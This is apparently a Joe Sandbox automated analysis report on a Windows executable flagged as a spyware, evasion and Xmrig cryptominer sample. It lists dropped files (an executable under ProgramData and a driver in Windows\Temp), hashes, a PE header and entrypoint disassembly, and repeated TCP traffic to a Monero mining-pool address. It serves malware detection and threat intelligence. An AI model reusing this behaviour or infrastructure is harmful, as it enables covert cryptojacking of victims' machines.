                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:rtYpMDeKUq.exe
                          renamed because original name is a hash value
                          Original Sample Name:3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3.exe
                          Detection:MAL
                          Classification:mal100.spyw.evad.mine.winEXE@56/12@1/1
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target svchost.exe, PID 5588 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • VT rate limit hit for: rtYpMDeKUq.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:31:13API Interceptor31x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          54.37.232.103ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                            file.exeGet hashmaliciousXmrigBrowse
                              12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousXmrigBrowse
                                  Chrome.exeGet hashmaliciousXmrigBrowse
                                    SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                                      setup.exeGet hashmaliciousXmrigBrowse
                                        SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          xmr-eu1.nanopool.orgNH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                          • 54.37.137.114
                                          ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                          • 54.37.232.103
                                          file.exeGet hashmaliciousXmrigBrowse
                                          • 163.172.154.142
                                          HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                          • 162.19.224.121
                                          12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                          • 51.15.65.182
                                          Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                          • 51.15.58.224
                                          boooba.exeGet hashmaliciousXmrigBrowse
                                          • 51.15.58.224
                                          2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                          • 51.15.58.224
                                          SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                          • 141.94.23.83
                                          Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                          • 54.37.232.103

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          OVHFRhttps://us10.mipcm.com:9743/pub/windows/mipc/v9.1.1.2201131522/MIPC_Setup_v9.1.1.2201131522.exeGet hashmaliciousUnknownBrowse
                                          • 54.39.107.85
                                          Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                          • 54.38.113.4
                                          https://url.us.m.mimecastprotect.com/s/7XsKCQWmqkh6El9PsPhEHGZMGK?domain=hbgone.docdroid.comGet hashmaliciousUnknownBrowse
                                          • 54.37.79.95
                                          https://www.patrimoine-commerce.com/Get hashmaliciousUnknownBrowse
                                          • 54.37.14.19
                                          https://www.anwesso.com/link.php?link=3D78_02_04_79_88_2B016-4C-01-3D9662EEC8D094AFED274D8E17627986-06D38F7B48CB30B897Get hashmaliciousUnknownBrowse
                                          • 54.36.109.16
                                          https://www.softwareaktion.com/kostenloser-vergleichGet hashmaliciousUnknownBrowse
                                          • 54.36.109.16
                                          https://inps-conferma-dati.it/Get hashmaliciousUnknownBrowse
                                          • 178.32.138.212
                                          o885M9rc16.exeGet hashmaliciousAsyncRAT, AveMaria, StormKitty, VidarBrowse
                                          • 139.99.85.8
                                          o885M9rc16.exeGet hashmaliciousAsyncRAT, AveMaria, StormKitty, VidarBrowse
                                          • 139.99.85.8
                                          https://www.patrimoine-commerce.com/Get hashmaliciousUnknownBrowse
                                          • 54.37.14.19

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Windows\Temp\jvocdauqvwbp.sysn7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                              PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                                  Eulen.exeGet hashmaliciousXmrigBrowse
                                                    U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                      file.exeGet hashmaliciousAmadey, XmrigBrowse
                                                        file.exeGet hashmaliciousXmrigBrowse
                                                          ICBM.exeGet hashmaliciousXmrigBrowse
                                                            file.exeGet hashmaliciousXmrigBrowse

                                                              Created / dropped Files

                                                              C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\rtYpMDeKUq.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2629632
                                                              Entropy (8bit):6.542373537682104
                                                              Encrypted:false
                                                              SSDEEP:49152:4FUPj9hHjc2Hil9gJaEgCR37gGVMISw6RtmGNIOLD1ciNKWI2O6xYWb3Kuz/+n:77vHM9gJaFCRPS3f7LrrOaYY6u8
                                                              MD5:9B1749C1BB9E8A354404B8A57DE68EC6
                                                              SHA1:4C8838D22EFC926551BE0E77ECD1E6A68E15F6C4
                                                              SHA-256:3829CF00079DD383532AC6637444081A9752F77D186DBDCBAFCC44DDDE0D9CF3
                                                              SHA-512:9E83796791FB49C0EE6592CAD4A294B86EB6EC624385F3DF8E040F9BAF545071637167D4C5EE6E9DA17AAD4F96251FC09DA71282EF7341F1D91D3FC78E2059EA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....w5g.........."......|....'.....@..........@..............................(...........`................................................. ...<............@(..............p(.x...............................(.......8...............X............................text...6z.......|.................. ..`.rdata..h...........................@..@.data...P.'......z'.................@....pdata.......@(.......(.............@..@.00cfg.......P(.......(.............@..@.tls.........`(.......(.............@....reloc..x....p(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllul3nqth:NllUa
                                                              MD5:851531B4FD612B0BC7891B3F401A478F
                                                              SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                              SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                              SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                              Malicious:false
                                                              Preview:@...e.................................&..............@..........

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5u0tsydo.fxt.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3wruhec.wn0.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tu1gyz51.jvf.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5ufnvg1.nxw.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................

                                                              C:\Windows\Temp\__PSScriptPolicyTest_d1cixtq0.kge.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Windows\Temp\__PSScriptPolicyTest_guca3kq4.5re.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Windows\Temp\__PSScriptPolicyTest_lp2ylgtl.uzo.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Windows\Temp\__PSScriptPolicyTest_txacixxz.sz4.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Windows\Temp\jvocdauqvwbp.sys

                                                              Download File
                                                              Process:C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):14544
                                                              Entropy (8bit):6.2660301556221185
                                                              Encrypted:false
                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Joe Sandbox View:
                                                              • Filename: n7ZKbApaa3.dll, Detection: malicious, Browse
                                                              • Filename: ICBM.exe, Detection: malicious, Browse
                                                              • Filename: PqSIlYOaIF.exe, Detection: malicious, Browse
                                                              • Filename: NH95Vhokye.exe, Detection: malicious, Browse
                                                              • Filename: Eulen.exe, Detection: malicious, Browse
                                                              • Filename: U9jAFGWgPG.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: ICBM.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Entropy (8bit):6.542373537682104
                                                              TrID:
                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                              • DOS Executable Generic (2002/1) 0.92%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:rtYpMDeKUq.exe
                                                              File size:2'629'632 bytes
                                                              MD5:9b1749c1bb9e8a354404b8a57de68ec6
                                                              SHA1:4c8838d22efc926551be0e77ecd1e6a68e15f6c4
                                                              SHA256:3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3
                                                              SHA512:9e83796791fb49c0ee6592cad4a294b86eb6ec624385f3df8e040f9baf545071637167d4c5ee6e9da17aad4f96251fc09da71282ef7341f1d91d3fc78e2059ea
                                                              SSDEEP:49152:4FUPj9hHjc2Hil9gJaEgCR37gGVMISw6RtmGNIOLD1ciNKWI2O6xYWb3Kuz/+n:77vHM9gJaFCRPS3f7LrrOaYY6u8
                                                              TLSH:23C533C51571A0FDC5DDA3B86C4A2DA23C6E987893C063F39BF0943520F46D962BCB96
                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....w5g.........."......|....'.....@..........@..............................(...........`........................................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x140001140
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x140000000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x673577BF [Thu Nov 14 04:08:31 2024 UTC]
                                                              TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:de41d4e0545d977de6ca665131bb479a

                                                              Entrypoint Preview

                                                              Instruction
                                                              dec eax
                                                              sub esp, 28h
                                                              dec eax
                                                              mov eax, dword ptr [00007ED5h]
                                                              mov dword ptr [eax], 00000001h
                                                              call 00007F059113D90Fh
                                                              nop
                                                              nop
                                                              nop
                                                              dec eax
                                                              add esp, 28h
                                                              ret
                                                              nop
                                                              inc ecx
                                                              push edi
                                                              inc ecx
                                                              push esi
                                                              push esi
                                                              push edi
                                                              push ebx
                                                              dec eax
                                                              sub esp, 20h
                                                              dec eax
                                                              mov eax, dword ptr [00000030h]
                                                              dec eax
                                                              mov edi, dword ptr [eax+08h]
                                                              dec eax
                                                              mov esi, dword ptr [00007EC9h]
                                                              xor eax, eax
                                                              dec eax
                                                              cmpxchg dword ptr [esi], edi
                                                              sete bl
                                                              je 00007F059113D930h
                                                              dec eax
                                                              cmp edi, eax
                                                              je 00007F059113D92Bh
                                                              dec esp
                                                              mov esi, dword ptr [00009651h]
                                                              nop word ptr [eax+eax+00000000h]
                                                              mov ecx, 000003E8h
                                                              inc ecx
                                                              call esi
                                                              xor eax, eax
                                                              dec eax
                                                              cmpxchg dword ptr [esi], edi
                                                              sete bl
                                                              je 00007F059113D907h
                                                              dec eax
                                                              cmp edi, eax
                                                              jne 00007F059113D8E9h
                                                              dec eax
                                                              mov edi, dword ptr [00007E90h]
                                                              mov eax, dword ptr [edi]
                                                              cmp eax, 01h
                                                              jne 00007F059113D90Eh
                                                              mov ecx, 0000001Fh
                                                              call 00007F0591144FE4h
                                                              jmp 00007F059113D929h
                                                              cmp dword ptr [edi], 00000000h
                                                              je 00007F059113D90Bh
                                                              mov byte ptr [002817C9h], 00000001h
                                                              jmp 00007F059113D91Bh
                                                              mov dword ptr [edi], 00000001h
                                                              dec eax
                                                              mov ecx, dword ptr [00007E7Ah]
                                                              dec eax
                                                              mov edx, dword ptr [00007E7Bh]
                                                              call 00007F0591144FDBh
                                                              mov eax, dword ptr [edi]
                                                              cmp eax, 01h
                                                              jne 00007F059113D91Bh
                                                              dec eax
                                                              mov ecx, dword ptr [00007E50h]

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa5200x3c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2840000x180.pdata
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2870000x78.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0xa6b80x158.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x7a360x7c00508e85d2962e224d87571c533e1a9f68False0.5040637600806451data6.178416223530926IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x90000x1c680x1e0073c300cabbdbd9cad11f354b142892f3False0.44140625zlib compressed data4.593464540807902IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xb0000x2788500x277a00247d547da2f821a4ff2bb4f14416fcf9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .pdata0x2840000x1800x2006d2c944d41c64c054606dec9385330caFalse0.505859375data3.105831651046345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .00cfg0x2850000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .tls0x2860000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .reloc0x2870000x780x200d5214b737f5e4bf102542b863347402cFalse0.2265625data1.420576874634762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Imports

                                                              DLLImport
                                                              msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 14, 2024 20:31:18.968641996 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:18.974328995 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:18.974400043 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:18.974620104 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:18.980509996 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:19.851478100 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:19.851831913 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:19.851891994 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:19.852627993 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:19.857558966 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:20.112195015 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:20.112394094 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:20.112556934 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:20.153182983 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:20.197783947 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:26.371062040 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:26.416558027 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:36.381167889 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:36.432261944 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:46.507371902 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:46.604132891 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:31:56.422102928 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:31:56.494837046 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:32:06.513501883 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:32:06.604279041 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:32:16.456892967 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:32:16.604312897 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:32:29.684164047 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:32:29.807544947 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:32:32.289335966 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:32:32.494921923 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:32:42.355012894 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:32:42.495480061 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:32:52.451644897 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:32:52.604409933 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:33:02.375360966 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:33:02.495033979 CET4970410343192.168.2.854.37.232.103
                                                              Nov 14, 2024 20:33:11.511797905 CET103434970454.37.232.103192.168.2.8
                                                              Nov 14, 2024 20:33:11.604438066 CET4970410343192.168.2.854.37.232.103

                                                              UDP Packets

